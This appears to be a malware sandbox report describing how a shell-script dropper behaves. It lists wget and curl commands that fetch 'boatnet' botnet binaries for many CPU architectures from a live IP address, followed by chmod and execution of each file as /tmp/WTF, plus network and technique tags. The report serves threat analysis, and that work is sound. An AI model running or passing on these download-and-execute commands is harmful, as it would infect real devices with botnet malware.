[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 tcp
(30 identical rows: 30 TCP connections to 154.216.19.166:3000, no domain resolved)

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:47

Platform

debian9-mipsbe-20240611-en

Max time kernel

92s

Max time network

96s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
(15 identical rows: 15 /bin/chmod executions)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
(15 identical rows: 15 executions of the dropped file /tmp/WTF)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
(15 identical rows: /usr/bin/curl read /proc/sys/crypto/fips_enabled on each of its 15 invocations)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 tcp
(30 identical rows: 30 TCP connections to 154.216.19.166:3000, no domain resolved)

Files

N/A